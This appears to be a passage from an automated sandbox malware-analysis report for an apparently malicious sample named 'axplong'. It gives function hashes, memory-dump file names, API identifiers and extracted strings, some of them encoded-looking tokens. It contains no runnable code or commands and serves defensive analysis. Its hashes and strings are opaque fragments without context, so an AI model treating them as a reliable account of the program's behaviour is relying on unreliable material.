                                                                      • Instruction ID: 8d7e2eef643ca509f12d9c3ba68bfd704485747cbec9b9b9b3856f46b6d0c66d
                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                      • Instruction Fuzzy Hash: D0113D7B20014147D6048A3DD9F45B7A7D6EBC5321B3C43FAD1514B768DE3AED45D900
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 55efca32861ff281b03bc5b6d7b4eba9befd90bd14aafac761c0a2a71d3a8aaf
                                                                      • Instruction ID: 14ba29f486b471cf4c8ca990d1cd1f510045fe2ea803ce4a8002d6a44066333c
                                                                      • Opcode Fuzzy Hash: 55efca32861ff281b03bc5b6d7b4eba9befd90bd14aafac761c0a2a71d3a8aaf
                                                                      • Instruction Fuzzy Hash: 88E08C31240A0C6FCF39BB15D96CE583B9AEB52342F504880FC145B221CB29ED85CE80
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                      • Instruction ID: 9e814edfe4ebbefda4802616ed722d3ec0a2f4937a5f140d12d9ec8241110b3b
                                                                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                                      • Instruction Fuzzy Hash: 88E04632921628EBCB15DB888904E8AF6ECEB49B01F1541D6B901F3240C270DF04C7D0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 246122658369$8KG0fymoFx==$Fz==$HBhr$WGt=$invalid stoi argument$stoi argument out of range
                                                                      • API String ID: 0-2390467879
                                                                      • Opcode ID: 80153c308c24d54c38dd4c1e2f3ae9676f686021aa40857457b63cdbf2186d64
                                                                      • Instruction ID: ef5c6b611f33524e02ddb9fe1ef5489e822daa16023bb32e0342e972b5353974
                                                                      • Opcode Fuzzy Hash: 80153c308c24d54c38dd4c1e2f3ae9676f686021aa40857457b63cdbf2186d64
                                                                      • Instruction Fuzzy Hash: 9402C371900248DFEF24EFA8C845BDEBBF5EF05304F604198E805A7282D7759A84CFA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _wcsrchr
                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                      • API String ID: 1752292252-4019086052
                                                                      • Opcode ID: 61883f1949f7b409d328e3cb8362d1f1816550770dee32d185596a89b6ac8edc
                                                                      • Instruction ID: 336c09e3b4f8beb73eafd59adfb473ad31cffbc80c33e88aabdb871bedf7eb47
                                                                      • Opcode Fuzzy Hash: 61883f1949f7b409d328e3cb8362d1f1816550770dee32d185596a89b6ac8edc
                                                                      • Instruction Fuzzy Hash: 8A014977788A122626182418BC02B3B17D8DB86BB672900EBFD58F73C2EE44DC4641A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Mtx_unlock$Cnd_broadcast
                                                                      • String ID:
                                                                      • API String ID: 32384418-0
                                                                      • Opcode ID: e2a2810f964568796f0f9bbc5b396396734b3cbfdf693d0a0fb6e39e9b566c21
                                                                      • Instruction ID: 6ccabce8a0f51f20810de224eba9f709727be32ac5231b8a5dcfd153f4c29fec
                                                                      • Opcode Fuzzy Hash: e2a2810f964568796f0f9bbc5b396396734b3cbfdf693d0a0fb6e39e9b566c21
                                                                      • Instruction Fuzzy Hash: 51A11470900725AFDB11DFA4D945BAABBF8FF14710F1045A9E819E7281EB39EA04CBD1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strrchr
                                                                      • String ID:
                                                                      • API String ID: 3213747228-0
                                                                      • Opcode ID: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                                                      • Instruction ID: 45c0e378e467e5464e0ce72fc0fda2bc7af533e71429ebbac5ac34ad70e340f6
                                                                      • Opcode Fuzzy Hash: 06cc7c729825ef3726f3ff46e89b4dfb23933aad1dd17f016a943cdb57bb7414
                                                                      • Instruction Fuzzy Hash: 07B104329003899FDB11CF68C8817AEBFE6EF55341F1481EAED59AB341D6349D49CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true
                                                                      • Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_b20000_axplong.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                      • String ID:
                                                                      • API String ID: 531285432-0
                                                                      • Opcode ID: 3d9f591a22327218f32c4e985880528eece52cbade225f46f6ccda53c1c86b09
                                                                      • Instruction ID: 5a7a7099f10c42937f6c9f2b3a882d92124a0da3809f0fe4075a9b87c2709029
                                                                      • Opcode Fuzzy Hash: 3d9f591a22327218f32c4e985880528eece52cbade225f46f6ccda53c1c86b09
                                                                      • Instruction Fuzzy Hash: CC212175E012199FDF10EFA4DC42DAEBBB8EF48714F2000A6F601B7251DB34AD418BA1